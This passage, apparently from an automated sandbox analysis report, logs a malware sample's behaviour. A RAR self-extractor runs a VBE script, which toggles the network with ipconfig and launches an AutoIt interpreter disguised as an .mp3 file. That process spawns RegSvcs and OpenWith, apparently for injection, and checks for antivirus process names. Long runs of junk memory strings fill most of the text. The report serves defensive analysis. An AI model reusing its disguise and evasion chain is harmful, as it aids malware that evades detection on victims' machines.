                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5*52565<5@5f5p5z5d5o5w5{5memstr_880b2fca-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6)636>6f6j6p6t6z6d6n6x6memstr_8809bdf3-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7#7)737=7g7r7z7^7d7h7n7x7memstr_a188020f-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8!8)8-83878=8g8q8[8f8n8r8x8|8memstr_42ed59dc-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9 9*959=9a9g9k9q9[9e9o9z9memstr_bfcfbe31-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :*:4:>:i:q:u:[:_:e:o:y:memstr_7b0e05a7-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ; ;$;*;.;4;>;h;r;];e;i;o;s;y;memstr_2095d276-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!<,<4<8<><b<h<r<\<f<q<y<}<memstr_10a10edb-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =!=+=5=@=h=l=r=v=\=f=p=z=memstr_6a00a33a-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>rmemstr_322eb374-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>rrrrrrrrmemstr_a0ee5b87-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrmemstr_9eb080af-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrmemstr_d0572c58-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_7cf7cdf0-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrmemstr_fec4be86-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrmemstr_56aaf974-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrmemstr_3679339b-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrmemstr_16bc23ee-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_cbe5bf69-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_353e8cea-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_0f47e708-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrmemstr_5bb4449d-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_f86704a9-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_756a5388-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_0f577941-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_ac3a1039-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrmemstr_dd3d09a9-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_c219027a-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrmemstr_91f0622e-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_4e24eba4-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_566f0b6f-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmmemstr_8e39a260-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmemstr_c66657ce-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr/memstr_95d11691-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_5a937bc8-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrmemstr_b1409f49-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!!!!memstr_aaa7efc2-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zzrrzzmemstr_2e3dd5d4-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqqrrzmemstr_eeb21013-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_439792ec-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rjjjjjjjjjjjjjrrrmemstr_83006967-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrmmmmmmmmmmmmm|memstr_68047a39-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmmmmmrrrrrrrrrrrrrrrmemstr_acb8f20c-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4g5f8l879w9a9memstr_35748e49-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <$<k<memstr_23c9e7c1-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =!=,=7=b=m=x=c=n=y=memstr_0afda70d-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =>">memstr_47e60004-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?*?5?g?r?d?o?z?memstr_74a1d53b-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5m8h8memstr_38f0b0cb-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 112b2f2j2n2r2v2z2^2b2memstr_c1edc7a3-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#4s4memstr_4478930f-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#5'5+5/53575;5?5c5g5k5o5s5w5[5_5c5g5k5o5s5w5{5memstr_22c80ed0-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6m6z6r7]7v7memstr_510bbce4-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?&?*?.?2?6?:?>?b?f?j?n?r?v?z?^?b?f?j?n?r?v?z?~?memstr_71285b46-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1-1x1memstr_aab16806-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6"6'6,61666<6e6memstr_6c12c1eb-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 727x7memstr_43582f6e-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7+8_8memstr_628f5a21-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9g9u9|9memstr_2723aadd-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;v;[;`;e;j;o;u;z;memstr_0cf1cd0f-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =f=u=memstr_90d866dc-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1 2l2memstr_e742a6f9-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3"373>3d3v3`3memstr_1ea9f4b9-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5,585g5l5m5s5x5memstr_7e37bedc-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%60686b6j6u6[6a6k6u6memstr_ae6b5c79-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8e8z8!999?9t9l9r9memstr_e08ba444-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :#:-:;:v:a:memstr_bb257531-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;b;v;];memstr_49b90b0b-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =&=f=l=memstr_88d31255-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >a>p>y>f>|>memstr_49b74055-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >"?+?1?9?>?q?e?j?}?memstr_118e0133-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 0'0.050<0c0k0s0[0g0p0u0{0memstr_a712d198-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1r1~1memstr_c395fc61-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4 4v4memstr_fa28e3fe-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_bb9f3f13-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_0854ec8a-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: = =v=memstr_06046888-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4d6k6memstr_ef0f2f1b-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7"7(7c7k7memstr_0fb0ce08-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 818?8f8l8q8memstr_85778287-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9+939i9memstr_356c1cb0-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:::f:k:p:n:x:memstr_5b2538ed-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;e;q;n<u<memstr_76d964a6-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>memstr_683de859-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>@memstr_aba5eacc-1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003DBB02 SendInput,keybd_event,7_2_003DBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003DEBB3 mouse_event,7_2_003DEBB3
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_003D13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_003D1EF3
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007847000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.000000000113B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: qwlvpmrupf.mp3, qwlvpmrupf.mp3.exe | Binary or memory string: Shell_TrayWnd
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296018168.0000000001403000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerq=
                Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001043000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" ThenEy

                Language, Device and Operating System Detection

                Source: Yara match | File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B26694 cpuid 0_2_00B26694
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00B1FD34
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\OpenWith.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B2454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00B2454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003CE5F8 GetUserNameW,7_2_003CE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003ABF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_003ABF0F
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B103BE GetVersionExW,0_2_00B103BE
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tcpview.exe
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078194158.0000000001805000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079848349.0000000001806000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2298245187.0000000001457000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2295050047.0000000001455000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294907619.0000000001447000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301395963.0000000001458000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214186237.0000000001A50000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217828434.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVGUI.exe
